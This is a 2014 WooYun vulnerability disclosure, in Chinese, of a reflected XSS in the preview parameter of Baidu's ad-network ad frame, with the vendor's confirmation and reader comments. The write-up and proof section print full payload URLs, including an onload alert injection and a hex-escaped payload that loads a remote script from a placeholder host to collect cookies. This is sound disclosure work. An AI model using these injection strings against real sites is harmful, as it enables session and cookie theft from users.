当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-049881

漏洞标题:百度网盟某处反射XSS与漏洞细节分析

相关厂商:百度

漏洞作者: thx

提交时间:2014-01-26 17:01

修复时间:2014-03-12 17:02

公开时间:2014-03-12 17:02

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-26: 细节已通知厂商并且等待厂商处理中
2014-01-27: 厂商已经确认,细节仅向厂商公开
2014-02-06: 细节向核心白帽子及相关领域专家公开
2014-02-16: 细节向普通白帽子公开
2014-02-26: 细节向实习白帽子公开
2014-03-12: 细节向公众公开

简要描述:

百度网盟反射XSS,百度说,你只能做个钓鱼的...

详细说明:

打开百度的网盟123(http://wm123.baidu.com/)

01.jpg


任选一个网站,预览广告.这里选择环球网(http://wm123.baidu.com/s/huanqiu.com)一个960X90广告位预览

02.jpg


来到预览页面(http://photo.huanqiu.com/gallery/2014-01/2724961.html?bd_cpro_prev=%7B%22selectScale%22%3A10009%2C%22showUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22src%22%3A%22%22%2C%22type%22%3A2%2C%22title%22%3A%22%22%2C%22isUpload%22%3A%220%22%2C%22imgWidth%22%3A%22960%22%2C%22imgHeight%22%3A%2290%22%2C%22imgUrl%22%3A%22http%3A%2F%2Fcpro.baidu.com%2Fcpro%2Fui%2Fpreview%2Fdefault_img_unit%2Ffix%2F960x90.jpg%22%2C%22image%22%3A%5B10009%2C10007%2C10013%2C10015%5D%2C%22tip%22%3A0%2C%22linkUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22imgTitle%22%3A%22%22%2C%22des1%22%3A%22%22%2C%22des2%22%3A%22%22%7D)

03.jpg


直接看广告位源码:

<!--联盟01-百度底通 begain-->
		    <div class="ad960x90" id="adUn_1"> </div>
		    <!--联盟01-百度底通 end-->


应试也是JS调用的,再F12看:

04.jpg


接着再来看有输出的参数吧,先把之前一条乱麻样的网址转个码:

http://photo.huanqiu.com/gallery/2014-01/2724961.html?bd_cpro_prev={"selectScale":10009,"showUrl":"http://wm.baidu.com","src":"","type":2,"title":"","isUpload":"0","imgWidth":"960","imgHeight":"90","imgUrl":"http://cpro.baidu.com/cpro/ui/preview/default_img_unit/fix/960x90.jpg","image":[10009,10007,10013,10015],"tip":0,"linkUrl":"http://wm.baidu.com","imgTitle":"","des1":"","des2":""}


参数值一个一个改改看:

http://photo.huanqiu.com/gallery/2014-01/2724961.html?bd_cpro_prev={"selectScale":10123,"showUrl":"http://wm.baidu.com/123","src":"","type":2,"title":"123","isUpload":"0","imgWidth":"960","imgHeight":"90","imgUrl":"http://cpro.baidu.com/cpro/ui/preview/default_img_unit/fix/960x90.jpg#123","image":[10009,10007,10013,10015],"tip":0,"linkUrl":"http://wm.baidu.com/456","imgTitle":"456","des1":"","des2":""}


重复更改尝试的过程忽略吧,这里直接上成功的,先弹个窗:

http://photo.huanqiu.com/gallery/2014-01/2724961.html?bd_cpro_prev=%7B%22selectScale%22%3A10009%2C%22showUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22src%22%3A%22%22%2C%22type%22%3A2%2C%22title%22%3A%22%22%2C%22isUpload%22%3A%220%22%2C%22imgWidth%22%3A%22960%22%2C%22imgHeight%22%3A%2290%22%2C%22imgUrl%22%3A%22http%3A%2F%2Fcpro.baidu.com%2Fcpro%2Fui%2Fpreview%2Fdefault_img_unit%2Ffix%2F960x90.jpg%23\x22\x20onload\x3Dalert\x281\x29\x20\x22%22%2C%22image%22%3A%5B10009%2C10007%2C10013%2C10015%5D%2C%22tip%22%3A0%2C%22linkUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22imgTitle%22%3A%22%22%2C%22des1%22%3A%22%22%2C%22des2%22%3A%22%22%7D


05.jpg


实际代码:

<img border="0" style="width:960px;height:90px" src="http://cpro.baidu.com/cpro/ui/preview/default_img_unit/fix/960x90.jpg#" onload="alert(1)" ""="">


像老坛酸菜,还是那个味,广告图片网址后#号,接js十六进制,其他应该也行.哪些参数需要过滤,百度应该更懂,这里也不详说了.
接着获取下cookie:

http://photo.huanqiu.com/gallery/2014-01/2724961.html?bd_cpro_prev=%7B%22selectScale%22%3A10009%2C%22showUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22src%22%3A%22%22%2C%22type%22%3A2%2C%22title%22%3A%22%22%2C%22isUpload%22%3A%220%22%2C%22imgWidth%22%3A%22960%22%2C%22imgHeight%22%3A%2290%22%2C%22imgUrl%22%3A%22http%3A%2F%2Fcpro.baidu.com%2Fcpro%2Fui%2Fpreview%2Fdefault_img_unit%2Ffix%2F960x90.jpg%23\x22\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x22\x76\x61\x72\x20\x73\x3d\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\x27\x73\x63\x72\x69\x70\x74\x27\x29\x3b\x73\x2e\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x78\x78\x78\x2e\x78\x78\x78\x2e\x78\x78\x78\x2f\x77\x6f\x77\x53\x33\x69\x3f\x31\x33\x39\x30\x30\x30\x38\x34\x31\x32\x27\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x62\x6f\x64\x79\x2e\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64\x28\x73\x29\x3b\x22%22%2C%22image%22%3A%5B10009%2C10007%2C10013%2C10015%5D%2C%22tip%22%3A0%2C%22linkUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22imgTitle%22%3A%22%22%2C%22des1%22%3A%22%22%2C%22des2%22%3A%22%22%7D


06.jpg


@#$%,我刚刚还很开心,很激动,看到cookie,我错了,我忽略了一件大事!图片是在框架里的,得到的是百度的cookie,弹窗什么的也就能钓钓鱼.就这样完了吗...
就这样完了吗?这不科学啊!再回到框架调用的地方.

<iframe width="960" height="90" src="http://cpro.baidu.com/cpro/ui/preview/templates/image.html?bd_cpro_prev=#%7B%22selectScale%22%3A10009%2C%22showUrl%22%3A%22http%3A%2F%2Fwm%252ebaidu%252ecom%22%2C%22src%22%3A%22%22%2C%22type%22%3A2%2C%22title%22%3A%22%22%2C%22isUpload%22%3A%220%22%2C%22imgWidth%22%3A%22960%22%2C%22imgHeight%22%3A%2290%22%2C%22imgUrl%22%3A%22http%3A%2F%2Fcpro%252ebaidu%252ecom%2Fcpro%2Fui%2Fpreview%2Fdefault_img_unit%2Ffix%2F960x90%252ejpg%22%2C%22image%22%3A%5B10009%2C10007%2C10013%2C10015%5D%2C%22tip%22%3A0%2C%22linkUrl%22%3A%22http%3A%2F%2Fwm%252ebaidu%252ecom%22%2C%22imgTitle%22%3A%22%22%2C%22des1%22%3A%22%22%2C%22des2%22%3A%22%22%7D&amp;ut=1390717653909" align="center,center" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" allowtransparency="true"></iframe>


有没有很眼熟,是的,还是那堆参数,再倒腾一下

%22imgHeight%22%3A%2290%22%2C%22imgUrl%22%3A%22http%3A%2F%2Fcpro.baidu.com%2Fcpro%2Fui%2Fpreview%2Fdefault_img_unit%2Ffix%2F960x90.jpg#\x22%22%2C"image"%3A%5B10009%2C10007%2C10013%2C10015%5D%2C"tip"%3A0%2C"linkUrl"%3A"http%3A%2F%2Fwm.baidu.com"%2C"imgTitle"%3A""%2C"des1"%3A""%2C"des2"%3A""%7D


07.jpg


呵呵,亮了.又试了几次,是#号起作用了,刚刚收到cookie的location开头也有个#号,可能是分隔符.
又一阵尝试,没有过滤onload等关键词,但是不能有等号.但正准备再试,源码变了,#号也没用了,不知道是百度作了调整,还是怎么,这速度太快了...

08.jpg


至此,我又失败了,只能获取百度cookie,在百度网盟投放站广告框架内执行JS.

漏洞证明:

http://photo.huanqiu.com/gallery/2014-01/2724961.html?bd_cpro_prev=%7B%22selectScale%22%3A10009%2C%22showUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22src%22%3A%22%22%2C%22type%22%3A2%2C%22title%22%3A%22%22%2C%22isUpload%22%3A%220%22%2C%22imgWidth%22%3A%22960%22%2C%22imgHeight%22%3A%2290%22%2C%22imgUrl%22%3A%22http%3A%2F%2Fcpro.baidu.com%2Fcpro%2Fui%2Fpreview%2Fdefault_img_unit%2Ffix%2F960x90.jpg%23\x22\x20onload\x3Dalert\x281\x29\x20\x22%22%2C%22image%22%3A%5B10009%2C10007%2C10013%2C10015%5D%2C%22tip%22%3A0%2C%22linkUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22imgTitle%22%3A%22%22%2C%22des1%22%3A%22%22%2C%22des2%22%3A%22%22%7D


05.jpg


http://photo.huanqiu.com/gallery/2014-01/2724961.html?bd_cpro_prev=%7B%22selectScale%22%3A10009%2C%22showUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22src%22%3A%22%22%2C%22type%22%3A2%2C%22title%22%3A%22%22%2C%22isUpload%22%3A%220%22%2C%22imgWidth%22%3A%22960%22%2C%22imgHeight%22%3A%2290%22%2C%22imgUrl%22%3A%22http%3A%2F%2Fcpro.baidu.com%2Fcpro%2Fui%2Fpreview%2Fdefault_img_unit%2Ffix%2F960x90.jpg%23\x22\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x22\x76\x61\x72\x20\x73\x3d\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\x27\x73\x63\x72\x69\x70\x74\x27\x29\x3b\x73\x2e\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x78\x78\x78\x2e\x78\x78\x78\x2e\x78\x78\x78\x2f\x77\x6f\x77\x53\x33\x69\x3f\x31\x33\x39\x30\x30\x30\x38\x34\x31\x32\x27\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x62\x6f\x64\x79\x2e\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64\x28\x73\x29\x3b\x22%22%2C%22image%22%3A%5B10009%2C10007%2C10013%2C10015%5D%2C%22tip%22%3A0%2C%22linkUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22imgTitle%22%3A%22%22%2C%22des1%22%3A%22%22%2C%22des2%22%3A%22%22%7D


09.jpg


修复方案:

你们更懂

版权声明:转载请注明来源 thx@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2014-01-27 15:01

厂商回复:

感谢提交,我们已联系业务部门处理此问题。
--“百度,因你更安全”

最新状态:

暂无

漏洞评价:

评论

  1. 2014-01-26 18:20 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    打赌:无影响,厂商忽略

  2. 2014-03-12 19:57 | laoyao ( 路人 | Rank:14 漏洞数:5 | ด้้้้้็็็็็้้้้้็็็็...)

    @动后河 没忽略 你赌输了